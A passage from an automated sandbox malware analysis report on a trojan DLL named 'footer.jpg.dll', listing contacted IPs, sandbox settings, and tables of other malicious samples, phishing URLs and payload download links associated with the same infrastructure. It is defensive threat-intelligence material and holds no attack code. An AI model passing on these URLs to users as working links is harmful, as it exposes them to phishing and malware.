                                                                                                                                                                                                high
                                                                                                                                                                                                https://login.skype.com/login/oauth/microsoft?client_id=73813385-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.msn.com/de-ch/news/other/juso-reicht-initiative-f%c3%bcr-stadtz%c3%bcrcher-gratis-%c3%b6de-ch[1].htm.4.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.msn.com/de-ch/news/other/attacke-am-stadelhofen-sorgt-f%c3%bcr-etliche-hasskommentare/arde-ch[1].htm.4.drfalse
                                                                                                                                                                                                        high

                                                                                                                                                                                                        Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        104.20.185.68
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        143.204.15.36
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        151.101.1.44
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                                                        Analysis ID:350960
                                                                                                                                                                                                        Start date:10.02.2021
                                                                                                                                                                                                        Start time:07:59:09
                                                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 7m 24s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Sample file name:footer.jpg.dll
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                        Number of analysed new started processes analysed:28
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • HDC enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal76.troj.winDLL@13/138@10/3
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HDC Information:
                                                                                                                                                                                                        • Successful, ratio: 79.8% (good quality ratio 77.1%)
                                                                                                                                                                                                        • Quality average: 80.7%
                                                                                                                                                                                                        • Quality standard deviation: 27.1%
                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                                                        • Found application associated with file extension: .dll
                                                                                                                                                                                                        Warnings:
                                                                                                                                                                                                        Show All
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 13.88.21.125, 13.64.90.137, 88.221.62.148, 131.253.33.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 184.30.24.22, 51.104.146.109, 92.122.213.194, 92.122.213.247, 152.199.19.161, 52.155.217.156, 20.54.26.129, 8.248.135.254, 67.27.234.126, 8.248.139.254, 67.26.73.254, 8.248.115.254
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a-0003.dc-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        No simulations

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                        104.20.185.68ct.dllGet hashmaliciousBrowse
                                                                                                                                                                                                          index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                                                                            header.dllGet hashmaliciousBrowse
                                                                                                                                                                                                              A6C8E866.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                A6C8E866.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                  usd2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                    ACH PAYMENT REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      https://atacadaodocompensado.com.br/office356.com-RD163Get hashmaliciousBrowse
                                                                                                                                                                                                                        http://free.atozmanuals.comGet hashmaliciousBrowse
                                                                                                                                                                                                                          https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                                                                                                                                                                            https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                                                                                                                                                                              https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2NGet hashmaliciousBrowse
                                                                                                                                                                                                                                http://www.greaudstudio.com/docs/fgn/m8jklv4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                  http://www.mmsend19.com/link.cfm?r=oa7eM9ij_RBON-2v1T88Zg~~&pe=j0r_9ysA6YUbQvHrDWJvh4Gx3YMu9AdRMZEN44LMtLmQjQ0-TtHHHXpzASqyDmEe5cSY4BozMo4XVY8-hiIbYw~~&t=Lwe7ivUhPR1MQND0QW-Bgw~~Get hashmaliciousBrowse
                                                                                                                                                                                                                                    http://kikicustomwigs.com/inefficient.phpGet hashmaliciousBrowse
                                                                                                                                                                                                                                      https://quip.com/bsalAnQMfvNmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        https://quip.com/bsalAnQMfvNmGet hashmaliciousBrowse
                                                                                                                                                                                                                                          https://0fficefax365.quip.com/FENkAKwe58EeGet hashmaliciousBrowse
                                                                                                                                                                                                                                            238oHn4fAA.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                              https://antwandale.buzz/FBG/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                143.204.15.36ph0t0.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                  0pz1on1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                    Where are the female CEOs.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                      https://www.jottacloud.com/s/192d9a10b7288404ad1a42236e9c9967aedGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        https://secure.adobecloudshare.ga/share/Kw0FfR8HBn96bAh2BDSZgfAMGBgRmaiw1KS0sNUwBAQVjbmZzbyYSC0FVQkc2BNTwUNDU9IFtVcXQray4uIT88P052BXkABPDsoNi47JFwQclg2/?office=quanvo@deloitte.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          151.101.1.44http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacbGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • cdn.taboola.com/libtrc/w4llc-network/loader.js

                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                          tls13.taboola.map.fastly.netacr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          ct.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          BullGuard.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Jidert.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header[1].jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SimpleAudio.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          cSPuZxa7I4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          umAuo1QklZ.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          usd2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          usd2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          595989.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SecuriteInfo.com.ArtemisF00BCCFBF4BA.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.f4e794908d8d8093.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SecuriteInfo.com.Artemis2EB570BBBAA8.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          33ffr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          contextual.media.netacr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31
                                                                                                                                                                                                                                                          TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31
                                                                                                                                                                                                                                                          ct.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.84.56.24
                                                                                                                                                                                                                                                          index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31
                                                                                                                                                                                                                                                          BullGuard.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31
                                                                                                                                                                                                                                                          Jidert.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 184.30.24.22
                                                                                                                                                                                                                                                          Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.84.56.24
                                                                                                                                                                                                                                                          header[1].jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.76.200.23
                                                                                                                                                                                                                                                          header.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 92.122.146.68
                                                                                                                                                                                                                                                          SimpleAudio.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.20.86.97
                                                                                                                                                                                                                                                          cSPuZxa7I4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 23.210.250.97
                                                                                                                                                                                                                                                          umAuo1QklZ.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 92.122.146.68
                                                                                                                                                                                                                                                          UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 23.210.250.97
                                                                                                                                                                                                                                                          usd2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 92.122.146.68
                                                                                                                                                                                                                                                          usd2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 92.122.146.68
                                                                                                                                                                                                                                                          595989.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31
                                                                                                                                                                                                                                                          SecuriteInfo.com.ArtemisF00BCCFBF4BA.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 23.210.250.97
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.f4e794908d8d8093.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 23.210.250.97
                                                                                                                                                                                                                                                          SecuriteInfo.com.Artemis2EB570BBBAA8.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 92.122.253.103
                                                                                                                                                                                                                                                          33ffr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 2.18.68.31

                                                                                                                                                                                                                                                          ASN

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                          AMAZON-02USwEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 54.98.132.28
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.532835de00afd90c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.d8f17bf7de7183ed.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.532835de00afd90c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.91264688dd8534b0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.213e13e37a770a54.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.3edc6cbe783b623c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.d8f17bf7de7183ed.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Artemis018048AA9219.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.27c0afbd5465ecc9.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.Generic.mg.533f1e8ba6b430aa.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.Racealer.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          SecuriteInfo.com.BehavesLike.Win32.Packed.bt.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 52.37.89.225
                                                                                                                                                                                                                                                          FASTLYUSSCAN_PO210205.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 185.199.111.153
                                                                                                                                                                                                                                                          Farie PO.docGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.13.188
                                                                                                                                                                                                                                                          acr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          ct.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.535.22246.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.0.133
                                                                                                                                                                                                                                                          dmHeTAQKjt.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.0.133
                                                                                                                                                                                                                                                          v1K1JNtCgt.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 185.199.108.153
                                                                                                                                                                                                                                                          Cerere de pret NUM003112 09-02-2021.docGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.13.188
                                                                                                                                                                                                                                                          index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          BullGuard.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Jidert.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header[1].jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SimpleAudio.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          cSPuZxa7I4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Phish.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.1.195
                                                                                                                                                                                                                                                          ace80239facd926583cb2f9ceb84bb9c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.0.133
                                                                                                                                                                                                                                                          82e6033fb85f4abe59e16cb29c9faca2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 151.101.0.133
                                                                                                                                                                                                                                                          CLOUDFLARENETUSABN RM753.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.21.14.177
                                                                                                                                                                                                                                                          DHL Parcel Details.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.194.16
                                                                                                                                                                                                                                                          ABN RM753.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.21.14.177
                                                                                                                                                                                                                                                          TELEGRAPHIC TRANSFER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.22.1.232
                                                                                                                                                                                                                                                          ATT200192.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 162.159.130.233
                                                                                                                                                                                                                                                          Btlldqti.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 162.159.130.233
                                                                                                                                                                                                                                                          Tuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.16.18.94
                                                                                                                                                                                                                                                          MicrosoftEdgeSetup.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 1.3.139.71
                                                                                                                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.7850.19332.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.8.238
                                                                                                                                                                                                                                                          Claim-738868413-02092021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.133.211
                                                                                                                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.7850.19332.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.8.238
                                                                                                                                                                                                                                                          Claim-738868413-02092021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.21.5.204
                                                                                                                                                                                                                                                          Scan-PI497110_pdf.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 23.227.38.74
                                                                                                                                                                                                                                                          Debtor_Statement.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.22.1.232
                                                                                                                                                                                                                                                          Shipping-Documents,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.188.154
                                                                                                                                                                                                                                                          SWIFT-MT103.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.188.154
                                                                                                                                                                                                                                                          CT-0000337_PROTECH DEL PEREU SAC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.188.154
                                                                                                                                                                                                                                                          acr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.184.68
                                                                                                                                                                                                                                                          TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.184.68
                                                                                                                                                                                                                                                          Claim-9696823-02092021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 172.67.133.211

                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                          9e10692f1b7f78228b2d4e424db3a98cTuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          acr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          ct.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          February Payroll.xls.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.535.22246.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Tuesday, February 9th, 2021 83422 a.m., 20210209083422.7B8380338EC1D61B@sophiajoyas.cl.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          255423.jhertlein.255423.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          BullGuard.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          P012108.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Jidert.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Zoom Invita______tion 2021020104882460.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Friday_ February 5th_ 2021 64427 a.m._ 20210205064427.64791275BD060468@juidine.com.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Jackson Collins@278180-3963.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header[1].jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          header.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          Remittance58404.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44
                                                                                                                                                                                                                                                          93762900.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          • 104.20.185.68
                                                                                                                                                                                                                                                          • 151.101.1.44

                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                          Entropy (8bit):2.469670487371862
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                                                                          MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                                                                          SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                                                                          SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                                                                          SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
